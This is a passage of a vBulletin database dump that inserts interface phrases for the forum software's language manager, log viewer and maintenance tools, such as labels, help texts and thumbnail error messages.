(36295, -1, 'just_fetch_phrases', 'language', 'Just fetch phrases\r\n(No language settings will be included if \'Yes\' is selected) ', 'vbulletin', '', 0, ''),
(36296, -1, 'keep', 'language', 'Keep', 'vbulletin', '', 0, ''),
(36297, -1, 'keep_all', 'language', 'Keep All', 'vbulletin', '', 0, ''),
(36298, -1, 'keep_orphans_notes', 'language', 'Shown here are all the translations for the orphan phrases you want to keep. You must choose one translation of each phrase to become the default version of that phrase.', 'vbulletin', '', 0, ''),
(36299, -1, 'language_code', 'language', 'Language Code This is the abbreviation your language uses, such as "en" or "en-US". See here for more information. ', 'vbulletin', 'vBulletin Solutions', 1160697927, '3.6.3'),
(36300, -1, 'language_manager', 'language', 'Language Manager', 'vbulletin', '', 0, ''),
(36301, -1, 'left', 'language', 'Left', 'vbulletin', '', 0, ''),
(36302, -1, 'left_to_right', 'language', 'Left to Right', 'vbulletin', '', 0, ''),
(36303, -1, 'locale', 'language', 'LocaleYou can define a locale so that dates are properly translated. The setting for your locale will depend on your server OS and not all locales are supported on all systems. Windows servers need to look here and everyone else needs to look here and here . You must fill in all of the override fields below and use the formatting found here . Examples for windows are \'Chinese\' and \'deu\'. Examples for Linux are \'de_DE\' and \'fr_FR\'. ', 'vbulletin', 'vBulletin Solutions', 1209721537, '3.7.1'),
(36304, -1, 'logdate_format_override', 'language', 'Log Date Format OverrideUse this to override the default Admin CP Log format ', 'vbulletin', '', 0, ''),
(36305, -1, 'master_language', 'language', 'MASTER LANGUAGE', 'vbulletin', '', 0, ''),
(36306, -1, 'no_x_phrases_defined', 'language', 'There are no {1} phrases defined', 'vbulletin', '', 0, ''),
(36307, -1, 'number_formatting', 'language', 'Number Formatting', 'vbulletin', '', 0, ''),
(36308, -1, 'overwrite_language_dfn', 'language', 'Overwrite Language (Selecting a language here will cause the imported language to overwrite an existing language. Leave blank to create a new language.) ', 'vbulletin', '', 0, ''),
(36309, -1, 'overwriting_language_x', 'language', 'Overwriting Language \'{1} \'', 'vbulletin', '', 0, ''),
(36310, -1, 'phrase_manager', 'language', 'Phrase Manager', 'vbulletin', '', 0, ''),
(36311, -1, 'phrase_name_only', 'language', 'Phrase Variable Name Only', 'vbulletin', '', 0, ''),
(36312, -1, 'phrase_text_and_phrase_name', 'language', 'Phrase Text and Phrase Variable Name', 'vbulletin', '', 0, ''),
(36313, -1, 'phrase_text_only', 'language', 'Phrase Text Only', 'vbulletin', '', 0, ''),
(36314, -1, 'phrase_translation_desc_1', 'language', 'When inserting a custom phrase, you may also specify the translations into whatever languages you have installed.', 'vbulletin', '', 0, ''),
(36315, -1, 'phrase_translation_desc_2', 'language', 'If you do leave a translation box blank, it will inherit the text from the \'Text to insert\' box', 'vbulletin', '', 0, ''),
(36316, -1, 'phrase_translation_desc_3', 'language', 'You may customize the translations further at any time.', 'vbulletin', '', 0, ''),
(36317, -1, 'phrases_to_show_per_page', 'language', 'Phrases to Show Per Page', 'vbulletin', '', 0, ''),
(36318, -1, 'quickref', 'language', 'QuickRef', 'vbulletin', '', 0, ''),
(36319, -1, 'rebuild_all_languages', 'language', 'Rebuild All Languages', 'vbulletin', '', 0, ''),
(36320, -1, 'rebuild_language_information', 'language', 'Rebuild Language Information', 'vbulletin', '', 0, ''),
(36321, -1, 'rebuilding_language_x', 'language', 'Rebuilding Language {1}', 'vbulletin', '', 0, ''),
(36322, -1, 'registereddate_format_override', 'language', 'Registration Date Format Override Use this to override the default registration date format ', 'vbulletin', '', 0, ''),
(36323, -1, 'right', 'language', 'Right', 'vbulletin', '', 0, ''),
(36324, -1, 'right_to_left', 'language', 'Right to Left', 'vbulletin', '', 0, ''),
(36325, -1, 'search_in_language', 'language', 'Search in Language', 'vbulletin', '', 0, ''),
(36326, -1, 'search_in_phrases', 'language', 'Search in Phrases', 'vbulletin', '', 0, ''),
(36327, -1, 'search_phrases', 'language', 'Search Phrases', 'vbulletin', '', 0, ''),
(36328, -1, 'search_translated_phrases_only', 'language', 'Search Translated Phrases Only\r\nWhen selecting a specific language, select \'Yes\' here to search translated phrases only, excluding untranslated items. ', 'vbulletin', 'vBulletin Solutions', 1151345323, '3.6.0 Beta 4'),
(36329, -1, 'standard_phrase', 'language', 'Standard Phrase', 'vbulletin', '', 0, ''),
(36330, -1, 'text_direction', 'language', 'Text Direction', 'vbulletin', '', 0, ''),
(36331, -1, 'thousands_separator', 'language', 'Thousands Separator (The character used to separate thousands in formatted numbers, such as the , used in 1,024. To specify a space, please use the underscore _ ) ', 'vbulletin', '', 0, ''),
(36332, -1, 'time_format_override', 'language', 'Time Format Override\r\nSee: http://www.php.net/manual-lookup.php?function=strftime \r\nExamples: (if a locale is specified) \r\nAM/PM Time Format (eg, 11:15 PM): %I:%M %p \r\n24-Hour Format Time (eg, 23:15): %H:%M \r\nDefault Time Format for this Locale: %X\r\n ', 'vbulletin', 'vBulletin Solutions', 1192528667, '3.7.0 Beta 1'),
(36333, -1, 'title_for_uploaded_language', 'language', 'Title for Uploaded Language (Leave blank to use the language title specified in the language file) ', 'vbulletin', '', 0, ''),
(36334, -1, 'updated_default_phrases_desc', 'language', 'The phrases shown on this page have been updated in the default language since you customized them. \r\n \r\nIt may be necessary for you to revert the custom phrases or otherwise check that they fully support vBulletin {1}. If you do not do this, some sections of vBulletin may not function! ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36335, -1, 'view_language', 'language', 'View Language', 'vbulletin', '', 0, ''),
(36336, -1, 'view_quickref', 'language', 'View QuickRef', 'vbulletin', '', 0, ''),
(36337, -1, 'view_summary', 'language', 'View Summary', 'vbulletin', '', 0, ''),
(36338, -1, 'x_phrases', 'language', '{1} Phrases', 'vbulletin', '', 0, ''),
(36339, -1, 'x_phrases_containing_y', 'language', '{1} Phrases Containing \'{2}\' ', 'vbulletin', '', 0, ''),
(36340, -1, 'admin_control_panel_failed_logins', 'logging', 'Admin Control Panel Failed Logins', 'vbulletin', '', 0, ''),
(36341, -1, 'album_x_by_y_deleted', 'logging', 'Album \'{1}\' by {2} Deleted', 'vbulletin', 'vBulletin Solutions', 1207226905, '3.7.0 Release Candidate 3'),
(36342, -1, 'album_x_by_y_edited', 'logging', 'Album \'{1}\' by {2} Edited', 'vbulletin', 'vBulletin Solutions', 1207152854, '3.7.0 Release Candidate 3'),
(36343, -1, 'all_log_entries', 'logging', 'All Log Entries', 'vbulletin', '', 0, ''),
(36344, -1, 'all_scheduled_tasks', 'logging', 'All Scheduled Tasks', 'vbulletin', '', 0, ''),
(36345, -1, 'all_scripts', 'logging', 'All Scripts', 'vbulletin', '', 0, ''),
(36346, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_control_panel_log', 'logging', 'Are you sure you want to prune {1} log entries from the control panel log?', 'vbulletin', '', 0, ''),
(36347, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_moderator_log', 'logging', 'Are you sure you want to prune {1} log entries from the moderator log?', 'vbulletin', '', 0, ''),
(36348, -1, 'are_you_sure_you_want_to_prune_x_log_entries_from_scheduled_task_log', 'logging', 'Are you sure you want to prune {1} log entries from the scheduled task log?', 'vbulletin', '', 0, ''),
(36349, -1, 'control_panel_log_pruning_permission_restricted', 'logging', 'Control Panel log pruning permission restricted.', 'vbulletin', '', 0, ''),
(36350, -1, 'control_panel_log_viewer', 'logging', 'Control Panel Log Viewer', 'vbulletin', '', 0, ''),
(36351, -1, 'control_panel_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Control Panel Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''),
(36352, -1, 'control_panel_log_viewing_restricted', 'logging', 'Control Panel log viewing restricted.', 'vbulletin', '', 0, ''),
(36353, -1, 'discussion_by_x_for_y_approved', 'logging', 'Discussion by {1} for {2} Approved', 'vbulletin', 'vBulletin Solutions', 1212163565, '3.7.1'),
(36354, -1, 'discussion_by_x_for_y_removed', 'logging', 'Group Discussion by {1} for {2} Removed', 'vbulletin', 'vBulletin Solutions', 1212066366, '3.7.1'),
(36355, -1, 'discussion_by_x_for_y_soft_deleted', 'logging', 'Group Discussion by {1} for {2} Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1212066409, '3.7.1'),
(36356, -1, 'discussion_by_x_for_y_unapproved', 'logging', 'Discussion by {1} for {2} unapproved', 'vbulletin', 'vBulletin Solutions', 1224675152, '3.8.0 Beta 2'),
(36357, -1, 'gm_by_x_in_y_for_z_approved', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Approved', 'vbulletin', 'vBulletin Solutions', 1210949565, '3.7.1'),
(36358, -1, 'gm_by_x_in_y_for_z_edited', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Edited', 'vbulletin', 'vBulletin Solutions', 1210949241, '3.7.1'),
(36359, -1, 'gm_by_x_in_y_for_z_removed', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Removed', 'vbulletin', 'vBulletin Solutions', 1210949353, '3.7.1'),
(36360, -1, 'gm_by_x_in_y_for_z_soft_deleted', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1210949386, '3.7.1'),
(36361, -1, 'gm_by_x_in_y_for_z_unapproved', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Unapproved', 'vbulletin', 'vBulletin Solutions', 1211887897, '3.7.1'),
(36362, -1, 'gm_by_x_in_y_for_z_undeleted', 'logging', 'Group Message by {1} in \'{2}\' for \'{3}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1210949456, '3.7.1'),
(36363, -1, 'id', 'logging', 'ID', 'vbulletin', '', 0, ''),
(36364, -1, 'log_entries', 'logging', 'Log Entries', 'vbulletin', '', 0, ''),
(36365, -1, 'log_entries_to_show_per_page', 'logging', 'Log Entries to Show Per Page', 'vbulletin', '', 0, ''),
(36366, -1, 'log_file_deletion_restricted', 'logging', 'Log file deletion restricted.', 'vbulletin', '', 0, ''),
(36367, -1, 'moderator_log_viewer', 'logging', 'Moderator Log Viewer', 'vbulletin', '', 0, ''),
(36368, -1, 'moderator_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Moderator Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''),
(36369, -1, 'order_by_action', 'logging', 'Order By Action', 'vbulletin', '', 0, ''),
(36370, -1, 'order_by_script', 'logging', 'Order By Script', 'vbulletin', '', 0, ''),
(36371, -1, 'pc_by_x_on_y_approved', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Approved', 'vbulletin', 'vBulletin Solutions', 1207235059, '3.7.0 Release Candidate 3'),
(36372, -1, 'pc_by_x_on_y_edited', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Edited', 'vbulletin', 'vBulletin Solutions', 1207234477, '3.7.0 Release Candidate 3'),
(36373, -1, 'pc_by_x_on_y_removed', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Removed', 'vbulletin', 'vBulletin Solutions', 1207234497, '3.7.0 Release Candidate 3'),
(36374, -1, 'pc_by_x_on_y_soft_deleted', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1207234488, '3.7.0 Release Candidate 3'),
(36375, -1, 'pc_by_x_on_y_unapproved', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Unapproved', 'vbulletin', 'vBulletin Solutions', 1207235067, '3.7.0 Release Candidate 3'),
(36376, -1, 'pc_by_x_on_y_undeleted', 'logging', 'Picture Comment by {1} on Picture \'{2}\' Undeleted', 'vbulletin', 'vBulletin Solutions', 1207235095, '3.7.0 Release Candidate 3'),
(36377, -1, 'picture_x_in_y_by_z_approved', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Approved', 'vbulletin', 'vBulletin Solutions', 1207236122, '3.7.0 Release Candidate 3'),
(36378, -1, 'picture_x_in_y_by_z_deleted', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Deleted', 'vbulletin', 'vBulletin Solutions', 1207227682, '3.7.0 Release Candidate 3'),
(36379, -1, 'picture_x_in_y_by_z_edited', 'logging', 'Picture \'{1}\' in Album \'{2}\' by {3} Edited', 'vbulletin', 'vBulletin Solutions', 1207227674, '3.7.0 Release Candidate 3'),
(36380, -1, 'prune_control_panel_log', 'logging', 'Prune Control Panel Log', 'vbulletin', '', 0, ''),
(36381, -1, 'prune_log_entries', 'logging', 'Prune Log Entries', 'vbulletin', '', 0, ''),
(36382, -1, 'prune_moderator_log', 'logging', 'Prune Moderator Log', 'vbulletin', '', 0, ''),
(36383, -1, 'prune_scheduled_task_log', 'logging', 'Prune Scheduled Task Log', 'vbulletin', '', 0, ''),
(36384, -1, 'remove_entries_logged_by_user', 'logging', 'Remove Entries Logged by User', 'vbulletin', '', 0, ''),
(36385, -1, 'remove_entries_older_than_days', 'logging', 'Remove Entries Older Than (Days)', 'vbulletin', '', 0, ''),
(36386, -1, 'remove_entries_related_to_action', 'logging', 'Remove Entries Relating to Action', 'vbulletin', '', 0, ''),
(36387, -1, 'remove_entries_relating_to_script', 'logging', 'Remove Entries Relating to Script', 'vbulletin', '', 0, ''),
(36388, -1, 'scheduled_task_log_viewer', 'logging', 'Scheduled Task Log Viewer', 'vbulletin', '', 0, ''),
(36389, -1, 'scheduled_task_log_viewer_page_x_y_there_are_z_total_log_entries', 'logging', 'Scheduled Task Log Viewer (page {1}/{2}) | There are {3} total log entries.', 'vbulletin', '', 0, ''),
(36390, -1, 'show_only_entries_generated_by', 'logging', 'Show Only Entries Generated By', 'vbulletin', '', 0, ''),
(36391, -1, 'show_only_entries_relating_to_script', 'logging', 'Show Only Entries Relating to Script', 'vbulletin', '', 0, ''),
(36392, -1, 'social_group_picture_x_in_y_removed', 'logging', 'Social Group Picture \'{1}\' in \'{2}\' Removed', 'vbulletin', 'vBulletin Solutions', 1207231009, '3.7.0 Release Candidate 3'),
(36393, -1, 'social_group_x_deleted', 'logging', 'Social Group \'{1}\' Deleted', 'vbulletin', 'vBulletin Solutions', 1207230211, '3.7.0 Release Candidate 3'),
(36394, -1, 'social_group_x_edited', 'logging', 'Social Group \'{1}\' Edited', 'vbulletin', 'vBulletin Solutions', 1207230203, '3.7.0 Release Candidate 3'),
(36395, -1, 'social_group_x_members_managed', 'logging', 'Social Group \'{1}\' Members Managed', 'vbulletin', 'vBulletin Solutions', 1207230533, '3.7.0 Release Candidate 3'),
(36396, -1, 'untitled', 'logging', 'Untitled', 'vbulletin', 'vBulletin Solutions', 1237982466, '3.8.2'),
(36397, -1, 'vbulletin_database_errors', 'logging', 'vBulletin Database Errors', 'vbulletin', '', 0, ''),
(36398, -1, 'view_logs', 'logging', 'View Logs', 'vbulletin', '', 0, ''),
(36399, -1, 'vm_by_x_for_y_approved', 'logging', 'Visitor Message by {1} for {2} Approved', 'vbulletin', 'vBulletin Solutions', 1207308347, '3.7.0 Release Candidate 3'),
(36400, -1, 'vm_by_x_for_y_edited', 'logging', 'Visitor Message by {1} for {2} Edited', 'vbulletin', 'vBulletin Solutions', 1207308276, '3.7.0 Release Candidate 3'),
(36401, -1, 'vm_by_x_for_y_removed', 'logging', 'Visitor Message by {1} for {2} Removed', 'vbulletin', 'vBulletin Solutions', 1207308311, '3.7.0 Release Candidate 3'),
(36402, -1, 'vm_by_x_for_y_soft_deleted', 'logging', 'Visitor Message by {1} for {2} Soft Deleted', 'vbulletin', 'vBulletin Solutions', 1207308303, '3.7.0 Release Candidate 3'),
(36403, -1, 'vm_by_x_for_y_unapproved', 'logging', 'Visitor Message by {1} for {2} Unapproved', 'vbulletin', 'vBulletin Solutions', 1207308341, '3.7.0 Release Candidate 3'),
(36404, -1, 'vm_by_x_for_y_undeleted', 'logging', 'Visitor Message by {1} for {2} Undeleted', 'vbulletin', 'vBulletin Solutions', 1207308326, '3.7.0 Release Candidate 3'),
(36405, -1, 'want_to_access_grant_access_to_this_script', 'logging', 'Want to restrict/grant access to this script?', 'vbulletin', '', 0, ''),
(36406, -1, 'affected_accounts_that_were_last_active_x_y', 'maintenance', 'Affected accounts that were last active {1}: {2} ', 'vbulletin', 'vBulletin Solutions', 1219329684, '3.8.0 Alpha 1'),
(36407, -1, 'affected_accounts_x', 'maintenance', 'Affected Accounts: {1}', 'vbulletin', 'vBulletin Solutions', 1219329869, '3.8.0 Alpha 1'),
(36408, -1, 'anon_server_survey', 'maintenance', 'Anonymous Server Survey', 'vbulletin', 'vBulletin Solutions', 1158153954, '3.6.1'),
(36409, -1, 'anon_server_survey_desc', 'maintenance', 'In order to provide products that are well-suited to the servers and sites that currently run vBulletin,\r\n we are running a survey to find out what kind of capabilities our customers\' servers have, and what scale\r\n of bulletin boards they run.
\r\n By submitting this survey to vBulletin.com you will help us to ensure that our forthcoming releases\r\n are both compatible with and make full use of the services available on your servers.
\r\n There is some data at the bottom of the form that is optional for you to submit. This information\r\n describes your own board, and lets us know how busy etc. your site is.
\r\n The information submitted in this survey is entirely anonymous and no information that can identify\r\n the site that posted the survey data will be collected.
', 'vbulletin', 'vBulletin Solutions', 1159793730, '3.6.2'),
(36410, -1, 'apache_modules', 'maintenance', 'Apache Modules', 'vbulletin', 'vBulletin Solutions', 1158154007, '3.6.1'),
(36411, -1, 'are_you_sure_empty_index', 'maintenance', 'Are you sure you wish to empty the search index?', 'vbulletin', '', 0, ''),
(36412, -1, 'building_attachment_thumbnails', 'maintenance', 'Building Attachment ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last attachment listed on the screen then refresh this window. ', 'vbulletin', '', 0, ''),
(36413, -1, 'building_avatar_thumbnails', 'maintenance', 'Building Avatar ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last avatar thumbnail listed on the screen then refresh this window. ', 'vbulletin', 'vBulletin Solutions', 1231770906, '3.8.1'),
(36414, -1, 'building_post_cache', 'maintenance', 'Building Post Cache', 'vbulletin', '', 0, ''),
(36415, -1, 'building_search_index', 'maintenance', 'Building Search Index', 'vbulletin', '', 0, ''),
(36416, -1, 'building_sgicon_thumbnails', 'maintenance', 'Building Social Group Icon ThumbnailsIf you receive a fatal error or if the process seems to hang, you will need to delete the last thumbnail listed on the screen then refresh this window. ', 'vbulletin', 'vBulletin Solutions', 1231772120, '3.8.1'),
(36417, -1, 'change_output_signatures_empty_cache', 'maintenance', 'If you have made changes that affect the output of signatures, you may use this to empty the cache and force signatures to be rebuilt with the new settings.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36418, -1, 'character_sets_usage', 'maintenance', 'Character Sets in Use', 'vbulletin', 'vBulletin Solutions', 1158154052, '3.6.1'),
(36419, -1, 'check_accounts_with_last_activity', 'maintenance', 'Check Accounts with Last Activity', 'vbulletin', 'vBulletin Solutions', 1219241260, '3.8.0 Alpha 1'),
(36420, -1, 'check_affected_accounts', 'maintenance', 'Check Affected Accounts', 'vbulletin', 'vBulletin Solutions', 1219230366, '3.8.0 Alpha 1'),
(36421, -1, 'check_styles_no_parent', 'maintenance', 'Check For Styles With No Parent', 'vbulletin', '', 0, ''),
(36422, -1, 'confirm_prefix_change_x_to_y', 'maintenance', 'Confirm Table Prefix Change (From \'{1}\' to \'{2}\')\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36423, -1, 'delete_duplicate_threads', 'maintenance', 'Delete Duplicate Threads', 'vbulletin', '', 0, ''),
(36424, -1, 'delete_x', 'maintenance', 'Delete {1}', 'vbulletin', '', 0, ''),
(36425, -1, 'deleted_orphan_threads_successfully', 'maintenance', 'Deleted Orphan Threads Successfully', 'vbulletin', '', 0, ''),
(36426, -1, 'email_from', 'maintenance', 'Email From', 'vbulletin', 'vBulletin Solutions', 1220137492, '3.8.0 Alpha 1'),
(36427, -1, 'email_permanently_banned_users', 'maintenance', 'Email Permanently Banned Users\r\nIf you select no, permanently banned users\' passwords will be reset, but they will not receive an email. Temporarily banned users will always be emailed. ', 'vbulletin', 'vBulletin Solutions', 1220350760, '3.8.0 Alpha 1'),
(36428, -1, 'email_subject', 'maintenance', 'Email Subject', 'vbulletin', 'vBulletin Solutions', 1219247828, '3.8.0 Alpha 1'),
(36429, -1, 'email_to_send_at_once', 'maintenance', 'Email to Send At Once', 'vbulletin', 'vBulletin Solutions', 1219328796, '3.8.0 Alpha 1'),
(36430, -1, 'empty_signature_cache', 'maintenance', 'Empty Signature Cache', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36431, -1, 'error_attachment_missing', 'maintenance', 'Error: Attachment Missing', 'vbulletin', '', 0, ''),
(36432, -1, 'error_thumbnail_failed_x', 'maintenance', 'Error: Library Error: {1}', 'vbulletin', '', 0, ''),
(36433, -1, 'error_thumbnail_nocreateimage', 'maintenance', 'Error: Invalid image file or GD version is set wrong', 'vbulletin', '', 0, ''),
(36434, -1, 'error_thumbnail_nogetimagesize', 'maintenance', 'Error: Could not determine image size', 'vbulletin', '', 0, ''),
(36435, -1, 'error_thumbnail_nogif', 'maintenance', 'Error: PHP lacks GIF support', 'vbulletin', '', 0, ''),
(36436, -1, 'error_thumbnail_nojpg', 'maintenance', 'Error: PHP lacks JPG support', 'vbulletin', '', 0, ''),
(36437, -1, 'error_thumbnail_nopng', 'maintenance', 'Error: PHP lacks PNG support', 'vbulletin', '', 0, ''),
(36438, -1, 'error_thumbnail_nosupport', 'maintenance', 'No support for this type in the chosen image library', 'vbulletin', '', 0, ''),
(36439, -1, 'error_thumbnail_notcorrectimage', 'maintenance', 'Incorrect extension for this file', 'vbulletin', '', 0, ''),
(36440, -1, 'error_thumbnail_notenoughmemory', 'maintenance', 'Error: Not Enough Memory', 'vbulletin', '', 0, ''),
(36441, -1, 'error_thumbnailalready', 'maintenance', 'Image is already <= thumbnail size', 'vbulletin', '', 0, ''),
(36442, -1, 'finds_users_without_complete_entries', 'maintenance', 'Finds any users who do not have complete entries in the database. Sometimes the data is not inserted correctly and the user\'s profile becomes unusable. Running this should correct any incomplete profiles.', 'vbulletin', '', 0, ''),
(36443, -1, 'first_post_date', 'maintenance', 'First Post Date', 'vbulletin', 'vBulletin Solutions', 1158154118, '3.6.1'),
(36444, -1, 'fix_broken_user_profiles', 'maintenance', 'Fix broken user profiles', 'vbulletin', '', 0, ''),
(36445, -1, 'function_allows_rebuild_all_style_info', 'maintenance', 'This function allows you to completely rebuild all style information. This is necessary after a major upgrade, or if you have manually edited any of the \'special\' templates.', 'vbulletin', '', 0, ''),
(36446, -1, 'function_rebuilds_reputation', 'maintenance', 'This function recalculates user reputation using the value that you specify below then adds the total reputation the user has received so far. This will remove any custom reputation that has been given to the user through the user editor.', 'vbulletin', '', 0, ''),
(36447, -1, 'function_rebuilds_thumbnails', 'maintenance', 'This function rebuilds the attachment thumbnails. It is needed when you enable thumbnails, change the thumbnail dimensions, or change the thumbnail JPG quality.', 'vbulletin', '', 0, ''),
(36448, -1, 'function_removes_orphan_posts', 'maintenance', 'This function removes all posts that belong to threads that no longer exist.', 'vbulletin', '', 0, ''),
(36449, -1, 'function_removes_orphan_threads', 'maintenance', 'This function removes all threads that belong to forums that no longer exist.', 'vbulletin', '', 0, ''),
(36450, -1, 'include_automatic_javascript_redirect', 'maintenance', 'Include automatic JavaScript redirect to next page?', 'vbulletin', '', 0, ''),
(36451, -1, 'last_upgrade_date', 'maintenance', 'Last Upgrade Date', 'vbulletin', 'vBulletin Solutions', 1158154129, '3.6.1'),
(36452, -1, 'list_of_tables_in_db_below', 'maintenance', 'Below is a list of all the tables in your database.\r\nYou should make sure that you select only tables that are part of vBulletin.
\r\nIf you are not sure, do not continue with this operation.
\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36453, -1, 'max_height', 'maintenance', 'Maximum Height', 'vbulletin', 'vBulletin Solutions', 1193951685, '3.7.0 Beta 1'),
(36454, -1, 'max_width', 'maintenance', 'Maximum Width', 'vbulletin', 'vBulletin Solutions', 1193951675, '3.7.0 Beta 1'),
(36455, -1, 'new_prefix_same_as_old', 'maintenance', 'You have not chosen a new table prefix, this script cannot continue. \r\n(Old table prefix: \'{1} \', new table prefix: \'{2} \')', 'vbulletin', '', 0, ''),
(36456, -1, 'new_table_name', 'maintenance', 'New Table Name\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36457, -1, 'new_table_prefix', 'maintenance', 'New Table Prefix\r\n', 'vbulletin', '', 0, ''),
(36458, -1, 'note_duplicate_threads_have_same', 'maintenance', 'Note: Duplicate threads are threads that have the same title, post name, and post time and are posting in the same forum as another thread.', 'vbulletin', '', 0, ''),
(36459, -1, 'note_rebuild_similar_thread_list', 'maintenance', 'Note: This will rebuild the similar thread list regardless of whether they are enabled or not. However, they will not be displayed until the option is enabled.', 'vbulletin', '', 0, ''),
(36460, -1, 'note_reindexing_empty_indexes_x', 'maintenance', 'Note: If you are re-indexing, you may want to empty the indexes. Click Here to do so! ', 'vbulletin', 'vBulletin Solutions', 1205941509, '3.7.0 Release Candidate 1'),
(36461, -1, 'note_server_intensive', 'maintenance', 'Note: This is a server intensive process.', 'vbulletin', '', 0, ''),
(36462, -1, 'number_of_attachments_to_process_per_cycle', 'maintenance', 'Number of attachments to process per cycle', 'vbulletin', '', 0, ''),
(36463, -1, 'number_of_avatars_to_process_per_cycle', 'maintenance', 'Number of avatars to process per cycle', 'vbulletin', 'vBulletin Solutions', 1193951739, '3.7.0 Beta 1'),
(36464, -1, 'number_of_forums_to_process_per_cycle', 'maintenance', 'Number of forums to process per cycle', 'vbulletin', '', 0, ''),
(36465, -1, 'number_of_icons_to_process_per_cycle', 'maintenance', 'Number of icons to process per cycle', 'vbulletin', 'vBulletin Solutions', 1231771437, '3.8.1'),
(36466, -1, 'number_of_posts_to_process_per_cycle', 'maintenance', 'Number of posts to process per cycle', 'vbulletin', '', 0, ''),
(36467, -1, 'number_of_threads_to_process_per_cycle', 'maintenance', 'Number of threads to process per cycle', 'vbulletin', '', 0, ''),
(36468, -1, 'number_of_users_to_process_per_cycle', 'maintenance', 'Number of users to process per cycle', 'vbulletin', '', 0, ''),
(36469, -1, 'old_table_prefix', 'maintenance', 'Old Table Prefix\r\n', 'vbulletin', '', 0, ''),
(36470, -1, 'only_accounts_using_language_x_were_processed', 'maintenance', 'Only accounts configured to use the language \'{1}\' were processed and notified.', 'vbulletin', 'vBulletin Solutions', 1222095679, '3.8.0 Alpha 2'),
(36471, -1, 'optional_info', 'maintenance', 'Optional Information', 'vbulletin', 'vBulletin Solutions', 1158153966, '3.6.1'),
(36472, -1, 'original_table_name', 'maintenance', 'Original Table Name\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36473, -1, 'other_prefix_warning', 'maintenance', 'WARNING! The following tables do not have the\r\noriginal table prefix! These tables may not be part of vBulletin.\r\n\r\nAre you absolutely sure you want to continue?\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36474, -1, 'over_1_month_ago', 'maintenance', 'Over 1 month ago', 'vbulletin', 'vBulletin Solutions', 1219231861, '3.8.0 Alpha 1'),
(36475, -1, 'over_1_week_ago', 'maintenance', 'Over 1 week ago', 'vbulletin', 'vBulletin Solutions', 1219231818, '3.8.0 Alpha 1'),
(36476, -1, 'over_any_period', 'maintenance', 'Over any period', 'vbulletin', 'vBulletin Solutions', 1219236015, '3.8.0 Alpha 1'),
(36477, -1, 'over_x_days_ago', 'maintenance', 'Over {1} days ago', 'vbulletin', 'vBulletin Solutions', 1219231781, '3.8.0 Alpha 1'),
(36478, -1, 'over_x_months_ago', 'maintenance', 'Over {1} months ago', 'vbulletin', 'vBulletin Solutions', 1219231882, '3.8.0 Alpha 1'),
(36479, -1, 'over_x_weeks_ago', 'maintenance', 'Over {1} weeks ago', 'vbulletin', 'vBulletin Solutions', 1219231841, '3.8.0 Alpha 1'),
(36480, -1, 'password_check_notice', 'maintenance', 'Some users may have created accounts with vulnerable passwords. Vulnerable passwords can be passwords that are: \r\nThe same as the account username \r\nSuch passwords make accounts vulnerable to exploitation from automated scripts and programs that can guess the password to access your board under the guise of the \r\naffected users. This may be done for the purposes of spam or online identity theft. \r\nUsers can no longer create accounts with the above vulnerabilities, but older accounts may still be affected. Affected users will be prompted to change their current password the next time they login. However, older accounts may still be vulnerable where the user no longer uses the account to access your board. Note that if you force a reset of an account and the email address associated with the account is no longer valid, the user may effectively be locked out of that account. \r\nFor this reason you may choose which accounts to reset based on the users\' last activity. Users who have recently logged in are more likely to change their password and email settings themselves. \r\nIt is advised that accounts that have not been accessed recently are reset first. You can check at a later time or date how many affected accounts remain before deciding to force a password reset. \r\nWhen you perform a reset, an email will be sent to the affected users. You will have an option to change the email message. ', 'vbulletin', 'vBulletin Solutions', 1219323721, '3.8.0 Alpha 1'),
(36481, -1, 'password_vulnerability_email_message_label', 'maintenance', 'Email MessageYou can change the default message that is sent to users when their password is reset. The tokens {username} and {password} can be placed in the message and will be replaced by their values for each individual user.You must insert the token {password} in the email. ', 'vbulletin', 'vBulletin Solutions', 1219320346, '3.8.0 Alpha 1'),
(36482, -1, 'passwords_reset', 'maintenance', 'Passwords Reset', 'vbulletin', 'vBulletin Solutions', 1219315588, '3.8.0 Alpha 1'),
(36483, -1, 'php_extensions', 'maintenance', 'PHP Extensions', 'vbulletin', 'vBulletin Solutions', 1158154020, '3.6.1'),
(36484, -1, 'php_openbase_dir', 'maintenance', 'PHP Open Basedir', 'vbulletin', 'vBulletin Solutions', 1158154041, '3.6.1'),
(36485, -1, 'php_safe_mode', 'maintenance', 'PHP Safe Mode', 'vbulletin', 'vBulletin Solutions', 1158154030, '3.6.1'),
